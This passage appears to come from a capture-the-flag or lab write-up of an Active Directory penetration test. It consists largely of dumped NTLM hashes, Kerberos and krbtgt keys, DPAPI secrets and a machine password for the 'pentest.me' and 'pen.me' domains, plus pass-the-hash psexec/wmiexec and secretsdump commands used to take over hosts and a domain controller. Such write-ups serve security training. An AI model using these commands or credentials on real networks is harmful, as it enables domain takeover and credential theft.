DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pentest.me\usera:1105:aad3b435b51404eeaad3b435b51404ee:3e60b861888eb6978cb426570b624df0:::
pentest.me\userb:1107:aad3b435b51404eeaad3b435b51404ee:ca7d33f074a52e6a880ace12f1eb2e7d:::
pentest.me\userc:1109:aad3b435b51404eeaad3b435b51404ee:43f746d8610c30d3576ea2f41932062c:::
pentest.me\gouhaobo:1113:aad3b435b51404eeaad3b435b51404ee:8cad7bd4c33a03c9154015a73c920e35:::
pentest.me\fuhongchang:1114:aad3b435b51404eeaad3b435b51404ee:8cad7bd4c33a03c9154015a73c920e35:::
pentest.me\liyichun:1115:aad3b435b51404eeaad3b435b51404ee:0e78f6d0e6c715473a7859a1d2102634:::
pentest.me\dingyangxi:1116:aad3b435b51404eeaad3b435b51404ee:6c3cc7aea9b4c9d9001898215e818f0a:::
pentest.me\quxingxiu:1117:aad3b435b51404eeaad3b435b51404ee:b66e7ce440e8eb8fed5106239ad22b02:::
pentest.me\kanxinghua:1118:aad3b435b51404eeaad3b435b51404ee:d1c0da92cdc4ad8622b031879c920f3c:::
pentest.me\luzizhuo:1119:aad3b435b51404eeaad3b435b51404ee:1cbec9dfcdade512f2b886ac55dfab5d:::
pentest.me\duguangxi:1120:aad3b435b51404eeaad3b435b51404ee:d7fb6ef27df893965ef33a7d8e85d824:::
pentest.me\wenhetai:1121:aad3b435b51404eeaad3b435b51404ee:2c6ea9b2878ee236ba1132897fe0ef94:::
pentest.me\jingjun4zhi:1122:aad3b435b51404eeaad3b435b51404ee:2b8f892534fcdd266cc37203605d505f:::
pentest.me\nengkangbo:1123:aad3b435b51404eeaad3b435b51404ee:cbe26534f6b98e4fd841ace467327779:::
pentest.me\quepengzu:1124:aad3b435b51404eeaad3b435b51404ee:14aa36f95d997500cf384a5285dfd77c:::
pentest.me\hongyuhang:1125:aad3b435b51404eeaad3b435b51404ee:44cc0d62d2f5b423a39c63f85cce39be:::
pentest.me\jitiancheng:1126:aad3b435b51404eeaad3b435b51404ee:fabb61695e6db714ffba720fc8793da8:::
pentest.me\xingjinghuan:1127:aad3b435b51404eeaad3b435b51404ee:6b764e2cb60905be1ad575b8e2c4b666:::
pentest.me\wenyulong:1128:aad3b435b51404eeaad3b435b51404ee:2b5a92df2be808f864a294ecf2bdbbc1:::
pentest.me\chekaifeng:1129:aad3b435b51404eeaad3b435b51404ee:bd6cd16ff9d521bb2716c7a3ff69b8be:::
pentest.me\niejun4ren:1130:aad3b435b51404eeaad3b435b51404ee:cb84989167d558ac2945569dace6b170:::
pentest.me\jufeihang:1131:aad3b435b51404eeaad3b435b51404ee:0697688dda32699960bf94b842149525:::
pentest.me\wuchengjiao:1132:aad3b435b51404eeaad3b435b51404ee:fbf01ddca787b9fc9503d94bff3d1268:::
pentest.me\ranjingfu:1133:aad3b435b51404eeaad3b435b51404ee:d1762f0e39ecbbc436b5d3b1cc946e9e:::
pentest.me\nongxuehai:1134:aad3b435b51404eeaad3b435b51404ee:6371c54e3842a0b127f66776060d5582:::
pentest.me\jianghongcai:1135:aad3b435b51404eeaad3b435b51404ee:fdc6137bf9f1ed67431651ea2719cbf4:::
pentest.me\lihaochu:1136:aad3b435b51404eeaad3b435b51404ee:14bff78443bfbf4b2963db873ed50a9e:::
pentest.me\zhongyongge:1137:aad3b435b51404eeaad3b435b51404ee:8590b0288615f568409fd85b9de27d92:::
pentest.me\yitianjiao:1138:aad3b435b51404eeaad3b435b51404ee:c77f975155e7a39d70e2eeb436fb5c44:::
pentest.me\gongliangzhe:1139:aad3b435b51404eeaad3b435b51404ee:e973c3e7194493c1ce2f631355faa42a:::
pentest.me\yuzhengcheng:1140:aad3b435b51404eeaad3b435b51404ee:5ff648a835c55a056d1bf5f114fc64ed:::
pentest.me\taiyuande:1141:aad3b435b51404eeaad3b435b51404ee:84b3f6c323d057502f8def18e79c4578:::
pentest.me\shenhongkuo:1142:aad3b435b51404eeaad3b435b51404ee:ccf4ceb6208ed153bb1904b05e0b2258:::
pentest.me\fanjincheng:1143:aad3b435b51404eeaad3b435b51404ee:ac0a033d46b75ac670e76b0080f42a84:::
pentest.me\weijingshuo:1144:aad3b435b51404eeaad3b435b51404ee:fa9fd905218b2a7318818b57ac23ee09:::
pentest.me\shuangliqin:1145:aad3b435b51404eeaad3b435b51404ee:d39a6b7f9eaa0fd029db53948183f7c5:::
pentest.me\eyongjia:1146:aad3b435b51404eeaad3b435b51404ee:31e8410c021bcfb31f2401f698c3d457:::
pentest.me\lihongguang:1147:aad3b435b51404eeaad3b435b51404ee:f66ff4ec163fff12db896f2780ddfb97:::
pentest.me\binghongzhen:1148:aad3b435b51404eeaad3b435b51404ee:6818556802fbd87074539232522da5f6:::
pentest.me\guixuyao:1149:aad3b435b51404eeaad3b435b51404ee:6549ba72f26141f49fa3f439ed1a481f:::
pentest.me\fanghanhan:1150:aad3b435b51404eeaad3b435b51404ee:9b1bcf349dc00f0f98b8e34248734c6c:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:1b1e5da161021a928ddb7962ce0e314a:::
IZMN9U6ZO3VTRNZ$:1106:aad3b435b51404eeaad3b435b51404ee:0e1183c781abc6bc9515f6d6fd2f2919:::
IZMN9U6ZO3VTRPZ$:1108:aad3b435b51404eeaad3b435b51404ee:6d252ff1c3ff45778dec169e6c24cc06:::
IZAYSXE6VCUHB4Z$:1110:aad3b435b51404eeaad3b435b51404ee:99b061fff48cc93b7d7cfd63a3442b3d:::
TEST$:1153:aad3b435b51404eeaad3b435b51404ee:00affd88fa323b00d4560bf9fef0ec2f:::
PEN$:1152:aad3b435b51404eeaad3b435b51404ee:307f4c3308181ece9d3d140c669f9641:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d5da6f5ecb1583a5390d63c1a5333509ebdfb5767ab2a01fa075494c54e60da9
Administrator:aes128-cts-hmac-sha1-96:010a385e25f750d8c7ea78773421994b
Administrator:des-cbc-md5:ce38923b97c4cd34
krbtgt:aes256-cts-hmac-sha1-96:76ee18a92c0a42c7e5b30c5788d60166c4c7b59b0517e58ae7247b48fd409125
krbtgt:aes128-cts-hmac-sha1-96:c3c68eac192b5ba2fa65377ce0fba37e
krbtgt:des-cbc-md5:a2e991c8e549a192
pentest.me\usera:aes256-cts-hmac-sha1-96:5fdf67c4123d44fd4cb7b66227b5e04d9ed6ead7d9297a3b7656b426f3c76987
pentest.me\usera:aes128-cts-hmac-sha1-96:5954d0cdc4d8e4877b2ab5e81d2b4e06
pentest.me\usera:des-cbc-md5:fb1c648f103262c2
pentest.me\userb:aes256-cts-hmac-sha1-96:6480a0b1e155fc2bfcdff1a63750a5f091aedf3f72ba7d67db4cb74bffedccaf
pentest.me\userb:aes128-cts-hmac-sha1-96:5d121354953b2f1a984e11b573320843
pentest.me\userb:des-cbc-md5:0e980115f4b3fb31
pentest.me\userc:aes256-cts-hmac-sha1-96:9e842f6424d85dc3fb1d08209405edc99d863d01a677eeeda62598296c4f6f42
pentest.me\userc:aes128-cts-hmac-sha1-96:0505d9ccc384c6d8cd0ad41dbd66f7d9
pentest.me\userc:des-cbc-md5:326279e68abf6bf8
pentest.me\gouhaobo:aes256-cts-hmac-sha1-96:da52b3998cc1805566e4ad0b2e13646fdc555670bfbd4d77f3114a0bd606721a
pentest.me\gouhaobo:aes128-cts-hmac-sha1-96:67d98b660d48d321d5dd2e0bf95e9a3b
pentest.me\gouhaobo:des-cbc-md5:f1b9b93edccb4c25
pentest.me\fuhongchang:aes256-cts-hmac-sha1-96:b9dd56a8b7a9a5dd41564f817bdcac591757af09da2a9086ec11ae11b04d6f8b
pentest.me\fuhongchang:aes128-cts-hmac-sha1-96:aee566fe152488d0376fcb3b2b39aaa3
pentest.me\fuhongchang:des-cbc-md5:16f1b3d31ada9449
pentest.me\liyichun:aes256-cts-hmac-sha1-96:86c54e9bc7672774f6255bb0f7789941999ba3dbe0e2b9d1c3ec3f9d0ef0a28c
pentest.me\liyichun:aes128-cts-hmac-sha1-96:1a74360e0b06c9a5af938bfb87ef3843
pentest.me\liyichun:des-cbc-md5:ecba49aeab7c2319
pentest.me\dingyangxi:aes256-cts-hmac-sha1-96:40e4a4f5915c0d5697929f6a55919ab41a173d519b99dc2d0a32714340ec2b21
pentest.me\dingyangxi:aes128-cts-hmac-sha1-96:1c4abd4da58f54d6574fa48e9d814cec
pentest.me\dingyangxi:des-cbc-md5:a4ad3d7f76c2101c
pentest.me\quxingxiu:aes256-cts-hmac-sha1-96:df8f27e16083632c5ba4b92c7a5f6064a63a2517829633656010f62bc287818a
pentest.me\quxingxiu:aes128-cts-hmac-sha1-96:d34d92a433a99bffd9c10bee9715a437
pentest.me\quxingxiu:des-cbc-md5:b52cc8c1a7e3cbb5
pentest.me\kanxinghua:aes256-cts-hmac-sha1-96:0a286aca85d524a19655a0ac9a8ed838b42866c3cc3218ee6192bb74250d1d02
pentest.me\kanxinghua:aes128-cts-hmac-sha1-96:df36ccd5aa32d9a88a245fa92a1d32f6
pentest.me\kanxinghua:des-cbc-md5:7c0d4fd93eda850b
pentest.me\luzizhuo:aes256-cts-hmac-sha1-96:6a45ac8aefd42ade8c466dae4afbb23bc2abe58417cbcd5f870b752c862960a6
pentest.me\luzizhuo:aes128-cts-hmac-sha1-96:564ae63fd527acab0bbeeb6334f0df2c
pentest.me\luzizhuo:des-cbc-md5:fb7fc81967317a6d
pentest.me\duguangxi:aes256-cts-hmac-sha1-96:d1651833ac41062d5265302ddea6205e2d259e74c53843f346855dd610c50c8b
pentest.me\duguangxi:aes128-cts-hmac-sha1-96:370df932f6cac4048573e0a694aeadba
pentest.me\duguangxi:des-cbc-md5:8a85895b8c6ef176
pentest.me\wenhetai:aes256-cts-hmac-sha1-96:00b0571433354d523732ce05155b244230c9ea7c419eb3996d0a45df9dbe5bdd
pentest.me\wenhetai:aes128-cts-hmac-sha1-96:fb2570c149df8969ab9abd531c89982a
pentest.me\wenhetai:des-cbc-md5:d3c8a28c79203451
pentest.me\jingjun4zhi:aes256-cts-hmac-sha1-96:8af949fca6e52790678e5d5c8e1a5e26fa4abda2efc878f7bf1ec6254e2d5169
pentest.me\jingjun4zhi:aes128-cts-hmac-sha1-96:b06818eb2b466175cc6147737523189a
pentest.me\jingjun4zhi:des-cbc-md5:c10e3eea26c77fe5
pentest.me\nengkangbo:aes256-cts-hmac-sha1-96:efca90637ef648998cfcec61bde02b6fd597a7f6d7c6a3b118e9bba5f5a033ed
pentest.me\nengkangbo:aes128-cts-hmac-sha1-96:69282e96b8ec8dd67ccaabe1e9cfa9b1
pentest.me\nengkangbo:des-cbc-md5:20ae46523eb32945
pentest.me\quepengzu:aes256-cts-hmac-sha1-96:f4a0b87f96ade59838429caf16a0daddcbb7287908092d6593041b2a7135425f
pentest.me\quepengzu:aes128-cts-hmac-sha1-96:ef04e882b9742d78743ca4c0073da656
pentest.me\quepengzu:des-cbc-md5:b00b4cabce70ec83
pentest.me\hongyuhang:aes256-cts-hmac-sha1-96:ebf8e746aa8e90e718b0e6cc50ff34f4d5a2f0405774af5d698f7ae7a3fd67ac
pentest.me\hongyuhang:aes128-cts-hmac-sha1-96:e265ecdd5f1c0642dcbe40aac90bb71e
pentest.me\hongyuhang:des-cbc-md5:b0d3856ef13d3875
pentest.me\jitiancheng:aes256-cts-hmac-sha1-96:5fc81a387e688cf624219b19cc722aec12f5d4f9750018bc1292b56d2aac0946
pentest.me\jitiancheng:aes128-cts-hmac-sha1-96:20926277f6aef9adfb4211ceb28e355e
pentest.me\jitiancheng:des-cbc-md5:eaecc875bc7adf54
pentest.me\xingjinghuan:aes256-cts-hmac-sha1-96:21bac1330589553241283f789db1377e6c0dc3ff1c66199a92085d2b2fc7a228
pentest.me\xingjinghuan:aes128-cts-hmac-sha1-96:89126fef9121c94ac7c0f627ecac9f93
pentest.me\xingjinghuan:des-cbc-md5:07b0512c3e577345
pentest.me\wenyulong:aes256-cts-hmac-sha1-96:5e181a83c5499a9bfa53b58860c765e894c29903a74669fc42c5c5f6f44bffdf
pentest.me\wenyulong:aes128-cts-hmac-sha1-96:0bc14a02e18d6b49c31fc29e3b106950
pentest.me\wenyulong:des-cbc-md5:1634ba5bd5764307
pentest.me\chekaifeng:aes256-cts-hmac-sha1-96:664caba5fabc0376760ddee730bf1d72ba252b78a481a944d343f899711ae1ca
pentest.me\chekaifeng:aes128-cts-hmac-sha1-96:df351849100e6853468c1614982ba25b
pentest.me\chekaifeng:des-cbc-md5:26c29ecd58644a57
pentest.me\niejun4ren:aes256-cts-hmac-sha1-96:7d0c0dfc77347d2e8384a2e2d5a0411215522756ec101385bbb2d14e53d1b2bd
pentest.me\niejun4ren:aes128-cts-hmac-sha1-96:a6f8fec73f1e83685fb4dbebe3925ffe
pentest.me\niejun4ren:des-cbc-md5:6e6b5208fbef38ae
pentest.me\jufeihang:aes256-cts-hmac-sha1-96:d0765350a62fc53f220c31f18c3e9bb1b67e319f6ecd0224782a4308cf24e377
pentest.me\jufeihang:aes128-cts-hmac-sha1-96:1911f69732a03369c4f77d3190723551
pentest.me\jufeihang:des-cbc-md5:643eda3edc574632
pentest.me\wuchengjiao:aes256-cts-hmac-sha1-96:350a3f812a6147bb593b55813c6db18a4320847be480a33eb8df8f2765b73464
pentest.me\wuchengjiao:aes128-cts-hmac-sha1-96:8472ad2b4eb656cfc7ede9fcf47e047d
pentest.me\wuchengjiao:des-cbc-md5:b9ba61808f9b1f7f
pentest.me\ranjingfu:aes256-cts-hmac-sha1-96:fdd48ce07a7339bc531a988c7978f8100b35c8a18e705bcc95d9e5c0414f0535
pentest.me\ranjingfu:aes128-cts-hmac-sha1-96:c58d63d25e28ee04c9b4b380861fd4e0
pentest.me\ranjingfu:des-cbc-md5:6132ea52bf4570ae
pentest.me\nongxuehai:aes256-cts-hmac-sha1-96:ad66f4db829812ec69a2ae5fc8c2fb171ad9b70f5f2f511c189e0e3415de2bf0
pentest.me\nongxuehai:aes128-cts-hmac-sha1-96:45e93f88790ece5d8ddcc573b53377a3
pentest.me\nongxuehai:des-cbc-md5:f845e3fe4a08feba
pentest.me\jianghongcai:aes256-cts-hmac-sha1-96:c0b8f749ad4b0b26b7f397906fbce73df976b5fd8d59c5090b9101c48f50a318
pentest.me\jianghongcai:aes128-cts-hmac-sha1-96:7edb53f4fd8e5761e32515a832d690c5
pentest.me\jianghongcai:des-cbc-md5:f2f2983d9b5743d9
pentest.me\lihaochu:aes256-cts-hmac-sha1-96:b6d9e4ace650c1348897bf80d4c39bce73376b49c2c75d42540ac9cb625d024f
pentest.me\lihaochu:aes128-cts-hmac-sha1-96:68db5728f70e1b41c50fa9c205839b58
pentest.me\lihaochu:des-cbc-md5:e95d327a83629e62
pentest.me\zhongyongge:aes256-cts-hmac-sha1-96:3edc51bd5bfb2208c57d4a52d59b889f2c0929169d59994ff7c7f88030d9ad59
pentest.me\zhongyongge:aes128-cts-hmac-sha1-96:7e740b646e80e3628cc7f9ff19711a03
pentest.me\zhongyongge:des-cbc-md5:0445ce9713dae580
pentest.me\yitianjiao:aes256-cts-hmac-sha1-96:2350bd020ba08f41b81ca535462c16c6383d7af55ba94446c3fed4e53576a61e
pentest.me\yitianjiao:aes128-cts-hmac-sha1-96:68a2b42d93834bdb35c36378e237df9c
pentest.me\yitianjiao:des-cbc-md5:6d85bf205b34dc2a
pentest.me\gongliangzhe:aes256-cts-hmac-sha1-96:72719e83b4690b1574d3892d15ae97180acefa29f7f750bff9f22cfd27a83e97
pentest.me\gongliangzhe:aes128-cts-hmac-sha1-96:80b672b99b06f12d182525c012e17b45
pentest.me\gongliangzhe:des-cbc-md5:373879f88a5b516d
pentest.me\yuzhengcheng:aes256-cts-hmac-sha1-96:3eee6c8dc7ff810dab2b8de6cf96d2833ef9fb3133bc9427602b6980ec0b0848
pentest.me\yuzhengcheng:aes128-cts-hmac-sha1-96:d0a731495f64c16df344746a08f75bcf
pentest.me\yuzhengcheng:des-cbc-md5:f1c11a343be5b04c
pentest.me\taiyuande:aes256-cts-hmac-sha1-96:d1dcb420f2081e9954050f9c078ebbcf71c88f5b886847ed7204d2382e269a2d
pentest.me\taiyuande:aes128-cts-hmac-sha1-96:b30f853ae872e1c1822d26b2fc549651
pentest.me\taiyuande:des-cbc-md5:c758c73d29731c92
pentest.me\shenhongkuo:aes256-cts-hmac-sha1-96:839927e4bf6abab35fac6449b060ffea3555bf831021b9947cc162fa127c5b74
pentest.me\shenhongkuo:aes128-cts-hmac-sha1-96:30d8ed33a8bbbee7dae08978ddf3967b
pentest.me\shenhongkuo:des-cbc-md5:a7ea61251561c268
pentest.me\fanjincheng:aes256-cts-hmac-sha1-96:bf92b57c5e6648adc4f3e567460622173babd2a3dfb8af6cdaff273f493d9c96
pentest.me\fanjincheng:aes128-cts-hmac-sha1-96:b57543c3ebd692f1db8188f4d5ebd17c
pentest.me\fanjincheng:des-cbc-md5:ceba9229455e3b54
pentest.me\weijingshuo:aes256-cts-hmac-sha1-96:f9287869fc1e4443b9a41722274eb58a7ff56bd1e42c379f7931554eb9f4bfb3
pentest.me\weijingshuo:aes128-cts-hmac-sha1-96:ef76225c31b9598070abd839d254fc2b
pentest.me\weijingshuo:des-cbc-md5:5183405e809bf458
pentest.me\shuangliqin:aes256-cts-hmac-sha1-96:9afa2eec549ab174b10f7e9f44afd479769b9d14c0993e1422fe4090b8c77e06
pentest.me\shuangliqin:aes128-cts-hmac-sha1-96:031913784dbc0ee26fbe52de5e227a47
pentest.me\shuangliqin:des-cbc-md5:c1e9299db6aee551
pentest.me\eyongjia:aes256-cts-hmac-sha1-96:942d15e2d81a2b3eb042accd3a85d2e60934493638b56aed2d69d4a7cf7715b9
pentest.me\eyongjia:aes128-cts-hmac-sha1-96:88e729a7672303443a5be54d13b33768
pentest.me\eyongjia:des-cbc-md5:68d9bf43086eb558
pentest.me\lihongguang:aes256-cts-hmac-sha1-96:5559e07a152fb2a7ff08b63a107c276ea404de545bc23a5325a78adccea90437
pentest.me\lihongguang:aes128-cts-hmac-sha1-96:75c7e193c1c10943be4bd125f896db4d
pentest.me\lihongguang:des-cbc-md5:867acead6bb6a7a7
pentest.me\binghongzhen:aes256-cts-hmac-sha1-96:d46fe8dd9beea4d8e7dc35d965694df780da60b75ff16bf6dd415df924369f9f
pentest.me\binghongzhen:aes128-cts-hmac-sha1-96:9590c0bf42541af855ef19ebcade7870
pentest.me\binghongzhen:des-cbc-md5:25e3a146c749344c
pentest.me\guixuyao:aes256-cts-hmac-sha1-96:82686eae79a40a6ff45f32275150feb2b1d7bffbf6619d2d3f062c028849e186
pentest.me\guixuyao:aes128-cts-hmac-sha1-96:f3c09ef04094bbd9aac359b6d64c8814
pentest.me\guixuyao:des-cbc-md5:f2d3494a51b94f0d
pentest.me\fanghanhan:aes256-cts-hmac-sha1-96:968fcf19212a0c062f58ff15ffa3ed27db52d50b3375e3a85ceb5d0da0d5263c
pentest.me\fanghanhan:aes128-cts-hmac-sha1-96:acbb35aedf74b55ebe0a2cacf8bdac33
pentest.me\fanghanhan:des-cbc-md5:86f88a541ac24f5e
DC$:aes256-cts-hmac-sha1-96:6a593d2f3f0e6e196a48a222c557be9bdb37f43f87fc5101ab248792d437212c
DC$:aes128-cts-hmac-sha1-96:b832b7c1fdfe9871afbc80e49da2a6ca
DC$:des-cbc-md5:4c011ac737457c1f
IZMN9U6ZO3VTRNZ$:aes256-cts-hmac-sha1-96:5eff6e5738fdf03c4b58b7c8f42f7ab911c1df3dab369cc3bf79ab411f042855
IZMN9U6ZO3VTRNZ$:aes128-cts-hmac-sha1-96:d80389c690e21ecde1baee163aa1afa5
IZMN9U6ZO3VTRNZ$:des-cbc-md5:198038ead52a5402
IZMN9U6ZO3VTRPZ$:aes256-cts-hmac-sha1-96:f7c897a22820263a9b6c3993c5abc8d1bf8dde0ae18dbc90ccc36d811325d0a2
IZMN9U6ZO3VTRPZ$:aes128-cts-hmac-sha1-96:34b183231afdd0f2a579134998279cdc
IZMN9U6ZO3VTRPZ$:des-cbc-md5:9b2a457a385b462a
IZAYSXE6VCUHB4Z$:aes256-cts-hmac-sha1-96:bc696b4693b02ca9dd7128dbc92cd6a3f93858a0a3809e0d10cf0c04a8bf9b77
IZAYSXE6VCUHB4Z$:aes128-cts-hmac-sha1-96:0f404e39fe1a7cd118ec43e090c55e7a
IZAYSXE6VCUHB4Z$:des-cbc-md5:abaec8625b8a1cd9
TEST$:aes256-cts-hmac-sha1-96:6b91d4434cd5ec81a232cf743c9f966c4ca8b1d1f503f0ec93baac592ec04ae1
TEST$:aes128-cts-hmac-sha1-96:28124f510d809dd692307a235120a536
TEST$:des-cbc-md5:04a1e092c7975431
PEN$:aes256-cts-hmac-sha1-96:6e87f4986b1c9742b27f06a34ba9e71315813a2f0035959fc6da4e32652333ff
PEN$:aes128-cts-hmac-sha1-96:59e0d781c2820844fd8ff818cba8634f
PEN$:des-cbc-md5:ad85aea4075297df
[*] Cleaning up...

Then connect with psexec, passing the pentest.me Administrator NT hash (the empty LM half is left blank before the colon):

psexec.py administrator@172.24.7.3 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk

flag06

First take the hosts beneath it: 172.24.7.43, 172.24.7.16, 172.24.7.48.

psexec pass-the-hash straight onto 172.24.7.43:

psexec.py pentest/administrator@172.24.7.43 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk

flag07

172.24.7.48:

wmiexec.py pentest/administrator@172.24.7.48 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk

psexec hung here for a long time; switching to wmiexec still hung, but at least it got me a shell. wmiexec runs commands through WMI and reads the output back over ADMIN$, so it does not have to install a service the way psexec does.

flag08

172.24.7.5 accepts the pentest.me domain admin account.

Once on it, dir against the C$ share of dcadmin.pen.me works straight away, which means this box is the pen.me DC:

psexec.py pentest/administrator@172.24.7.5 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -codec gbk
dir \\dcadmin.pen.me\c$

So just secretsdump pen.me directly (the DRSUAPI replication path needs DC-level rights, which the pentest.me admin evidently has on this host):

secretsdump.py pentest.me/administrator@172.24.7.5 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -dc-ip 172.24.7.5

pen.me\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f91138ef5392b87416ed41cb6e810b7:::

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x54028728cd0f6f79afa4896f1d07ea85
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c339cf871da141b43386b232f2466d0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PEN\DCadmin$:aes256-cts-hmac-sha1-96:831fe5130f7b81bf8c62386306681d528408d74567152c4c59b7ee0fbabbedb2
PEN\DCadmin$:aes128-cts-hmac-sha1-96:ff88abc8419a4f1f644dba1b5af4c318
PEN\DCadmin$:des-cbc-md5:54c8a2378025b38c
PEN\DCadmin$:plain_password_hex:4fff3075916eefd02e46cf997a3d8be03f28e62618a788c789a8d3a192c4e890140dbe6c688f6e972e54c60c97d88273b597b829b1bce4f04d2d0e54e3010064d3b87112c0b8fdc6e69163206a20d6ef5a34db8f78711938f9e22674f45acc22895855f8d3f7310e7f9e749c4f48f3c468f74884140db04d79595484c48d8096f4ea4a0d8d1d47dac9a369c3ded71582153286424f9275f99d7ff2973794ec6d8d02e07ac53e98017ec3d9f58f959d60534e249144a77f01d4bd586614430fb4b48a0877123054e03f15377fbeca7bda36220927efd7fbb7667944e13655ecab028c55d7cee18b74f57cfebb3dd1ef9d
PEN\DCadmin$:aad3b435b51404eeaad3b435b51404ee:a31d20b6f435ab36509b3a119a4f1d95:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x8357c8f566f861b6eb62818ba431abf9ae7956ed
dpapi_userkey:0x7010dda34979af5b3b2b081aeccd6966a0b296da
[*] NL$KM
0000 9D 83 14 71 4B 67 2E 66 8B 36 79 E5 74 94 DF CE ...qKg.f.6y.t...
0010 F8 0F 28 EC 6A 7A 89 28 4F F7 D1 07 B7 9A B8 6E ..(.jz.(O......n
0020 14 76 A6 CC 5E 52 A4 86 86 55 3A C1 37 51 5D 87 .v..^R...U:.7Q].
0030 3D 33 6E A7 45 EE 79 E8 89 60 CC A6 AA 98 58 EE =3n.E.y..`....X.
NL$KM:9d8314714b672e668b3679e57494dfcef80f28ec6a7a89284ff7d107b79ab86e1476a6cc5e52a48686553ac137515d873d336ea745ee79e88960cca6aa9858ee
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
pen.me\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f91138ef5392b87416ed41cb6e810b7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d72190307a2b763c222714e0eebc339:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\$431000-9LF00TRKAIIC:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_21baf503acf944adb:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_86d7f51fac504d10b:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_5499dba5058d4735b:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_4969a77b2f01469cb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_3c7e4e650fe944fbb:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_823df2fc495d43cc8:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_24646eb63333484e8:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_de5632833a404141a:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_3f73ae625e834c9a8:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\HealthMailbox7e80c8e:1135:aad3b435b51404eeaad3b435b51404ee:b35d9ed6c91c742398aeb117d432b80c:::
pen.me\HealthMailboxeda7e80:1136:aad3b435b51404eeaad3b435b51404ee:922beda4625d5aeb3663a6e54342ea69:::
pen.me\HealthMailbox285895e:1137:aad3b435b51404eeaad3b435b51404ee:511c807cd8e59b000bc312255543e5fd:::
pen.me\HealthMailbox51cfeb1:1138:aad3b435b51404eeaad3b435b51404ee:f305168ff895e29d3745888c6a793002:::
pen.me\HealthMailboxc4b8425:1139:aad3b435b51404eeaad3b435b51404ee:18e23133d26cdb9739e242d8bbc34809:::
pen.me\HealthMailbox528d2e1:1140:aad3b435b51404eeaad3b435b51404ee:e4a755e4a52824dff8fbc0bdc407f72b:::
pen.me\HealthMailboxc5e00fd:1141:aad3b435b51404eeaad3b435b51404ee:08333ec70b3f1f6a0d1d72d96e3d04b6:::
pen.me\HealthMailboxee2d866:1142:aad3b435b51404eeaad3b435b51404ee:ef20a63fe85c29209f1e248370968513:::
pen.me\HealthMailbox190d1f5:1143:aad3b435b51404eeaad3b435b51404ee:bbac9374b2dda3615fbfc262489839ab:::
pen.me\HealthMailbox45dde9b:1144:aad3b435b51404eeaad3b435b51404ee:dcb96076b068d0a73b2e1adbd23a1bd2:::
pen.me\HealthMailboxbb65e08:1145:aad3b435b51404eeaad3b435b51404ee:f3839bb82cf1c86713244f7e72623607:::
pen.me\userd:1146:aad3b435b51404eeaad3b435b51404ee:b8e52066381b9c3d08d8661a0c0d5a72:::
pen.me\exchange:1148:aad3b435b51404eeaad3b435b51404ee:21a43bd74a20a330ef77a4e7bd179d8c:::
DCADMIN$:1000:aad3b435b51404eeaad3b435b51404ee:a31d20b6f435ab36509b3a119a4f1d95:::
IZ1TUCEKFDPCEMZ$:1104:aad3b435b51404eeaad3b435b51404ee:96bf1afb33026f219bb16f7d9d3d4e78:::
IZ88QYK8Y8Y3VXZ$:1147:aad3b435b51404eeaad3b435b51404ee:0c11dedcf21d317c4626e4bff133fad3:::
PENTEST$:1149:aad3b435b51404eeaad3b435b51404ee:c8327547b8c01d2b4afdc5d4ad3846e4:::
[*] Kerberos keys grabbed
pen.me\Administrator:aes256-cts-hmac-sha1-96:aa003d0f53e6c5a8dd28e22b4e6b87340151d230f223f8e156c333bb59c65644
pen.me\Administrator:aes128-cts-hmac-sha1-96:dc24b2b0b854a4decd23582da613919e
pen.me\Administrator:des-cbc-md5:e368d962bacbe097
krbtgt:aes256-cts-hmac-sha1-96:3a72075a3affbc661707a01cf93dcd845ed669978279ff7af2173543a5bd5b7a
krbtgt:aes128-cts-hmac-sha1-96:77fd505df070d3422cd1a19108420d8b
krbtgt:des-cbc-md5:1cfd7fe69498c48f
